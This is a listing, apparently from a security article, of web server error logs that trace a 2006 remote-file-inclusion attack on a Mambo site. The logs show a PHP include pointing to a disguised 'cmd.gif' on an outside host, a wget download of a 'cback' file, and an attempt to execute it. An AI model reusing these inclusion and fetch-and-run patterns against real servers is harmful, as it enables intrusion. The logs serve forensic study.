Listing 7. Web Server Error Logs Showing Attack Traces

[Thu May 04 07:52:24 2006] [error] [client 10.9.233.25]
File does not exist: /var/www/html/mambo
[client 10.9.233.25] PHP Warning:
main(http://ess.trix.net/therules.dat):
failed to open stream: HTTP
request failed! HTTP/1.1 404 Not Found\r\n in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 13
[client 10.9.233.25] PHP Warning:  main(): Failed opening
'http://ess.trix.net/therules.dat' for inclusion
(include_path='.:/usr/share/pear') in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 13
[client 10.9.233.25] PHP Notice:  Undefined variable:  pro4 in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 69
[ ...output trimmed ]
[client 10.9.233.25] PHP Notice:  Undefined variable:
SERVER_SOFTWARE in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 112
[client 10.9.233.25] PHP Notice:  Undefined variable:
SERVER_VERSION in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 112
--07:52:24--  http://172.16.31.57/cback
           => `cback'
Connecting to 172.16.31.57:80... connected.
HTTP request sent, awaiting response... [Thu May 04 07:52:25 2006]
[error] [client 10.9.233.25] File does not exist: /var/www/html/cvs
200 OK
Length: 13,901 (14K) [text/plain]

    0K .......... ...                         100%  110.90
KB/s

07:52:27 (110.90 KB/s) - `cback' saved [13901/13901]

sh: ./cback: Permission denied
[client 10.9.233.25] PHP Notice:  Undefined variable:  ch_msg in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php on line 202
[ ...output trimmed...]
[client 10.9.233.25] PHP Fatal error:  Cannot redeclare safemode()
(previously declared in
http://172.16.31.57/cmd.gif?/includes/HTML_toolbar.php:129) in
http://172.16.31.57/cmd.gif?/includes/footer.php on line 129